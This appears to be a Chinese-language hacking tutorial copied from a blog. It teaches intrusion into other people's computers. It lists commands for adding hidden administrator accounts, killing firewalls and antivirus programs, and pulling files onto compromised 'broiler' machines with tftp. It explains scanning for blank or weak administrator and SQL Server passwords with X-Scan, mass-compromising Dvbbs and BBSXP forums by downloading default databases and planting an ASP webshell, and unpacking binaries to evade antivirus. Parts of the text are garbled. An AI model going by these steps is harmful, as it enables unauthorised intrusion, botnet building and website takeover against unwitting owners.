本文摘抄自http://www.cnitblog.com/zhangyafei/
第一课: 入侵必备DOS命令总结
一.对用户操做
net user --------查看有哪些用户
net user guest /active:yes ------ 激活guest用户
net user 用户名 密码 /add ------建立用户
net localgroup administrators 用户名 /add ------- 把“用户”添加到管理员中使其具有管理员权限
二.必备命令
net start -----查看开启了哪些服务
net start 服务名-----开启服务
net stop 服务名------停止某服务
netstat -an :查看端口的网络连接情况
ipconfig :查看本地ip地址
三.关防火墙,杀毒软件命令
net stop sharedaccess ----关系统自带防火墙
pskill.exe ravmon -----杀掉瑞星软件
pskill.exe pfw ----关天网防火墙
net stop "Symantec AntiVirus"----关于诺顿企业版
net stop KAVStart------关闭金山杀毒
向肉鸡上传文件命令:
第一种方法:tftp
命令格式:tftp -i 你的公网IP get xx.exe
:计算机运行命令全集 winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音罖@刂瞥绦?br>sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------**整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略
第二课:x-scan扫描器的使用技巧详解
一.详解x-scan的配置:
1.扫描模块设置:
1).开放服务
(2).远程控制系统
(3).nt-server弱口令-----administrator 空口令或弱口令.
(4).sql-server弱口令 ---sa 空口令或弱口令.
2.扫描IP范围设置:
(1).指定IP范围.
(2).从文件中导入IP列表.
二.x-scan在入侵中的应用:
1.对系统的综合安全检测,有针对性的入侵.
2.找肉鸡
nt-server弱口令
sql-server弱口令
3.邮箱,ftp,vnc的破解
三.x-scan入侵实例演示部分:
1.找同一城市的nt-server弱口令肉鸡.(一般都是个人PC)
2.s扫 + x-scan扫描 找sa空口令肉鸡(一般都是服务器)
s扫描-----扫开放1433的机子
x-scan扫描-----对开放1433的机子进行弱口令探测.
第五课:网站猎手批量入侵实战演示
黑天
一.二个重点要素:
1.关键字: 存在漏洞的程序所共有的特证.关键字一定要选准,这样命中率才高.
选择技巧:一般选择论坛最低部的版权信息或程序名称.
2.检测的页面或文件: 也就是程序存在漏洞的地方
二.网站猎手批量入侵实战演示篇:
1.实战演示一:
检测的页面或文件: data/dvbbs7.mdb
关键字:Powered By :Dvbbs Version 7.0.0
由默认数据库到拿网站webshell过程:
第一步:下载动网默认数据库
第二步:在数据库中找管理员密码
技巧:动网论坛不需要破解MD5管理员密码,可以查看日志文件直接找到密码.
第三步:在前台以jpg格式上传asp木马.
第四步:用备份数据库功能把jpg格式备份成我们的ASP木马.
2.演示二:
检测的页面或文件:database/bbsxp.mdb
关键字:Powered by BBSXP 7.00
3.演示三:
检测的页面或文件:upfile_flash.asp
关键字:商城
四:关于批量得webshell的其它思路
1.思路一:
到大型源码下载中心,把下载量较大的源程序,下载回来研究.
主要研究他们的默认数据库地址,默认管理账号和密码,默认后台.
然后用关键字结合网站猎手批量检测.很快就提到大量webshell
2.思路二:社会工程学批量入侵拿webshell
1.免杀
2.破解
3.程序汉化,个性修改.
二.脱壳四步骤:
第一步:查壳
常用查壳工具: PEID ,FI ,PE-SCAN 等.
第二步:找OEP
工具:ollydbg
第三步:脱壳
常用脱壳工具:
1.OD自带的脱壳插件:右键脱壳之.
2.LordPE:选择所调试进程右键,完整脱壳.
第四步:修复
Import REConstructor 1.6
三.在ollydbg脱壳中常用快捷键介绍
F2: 下断点.
F4:运行到所选择的那一行.-----遇到向上跳时用到
F7:单步进入----遇到近call时用到.
F8:单步跟踪
F9:运行程序
Shift+F9 :忽略异常运行
Alt+M:打开内存镜像
什么时候用,用哪个?以后会在具体实践操作中具体讲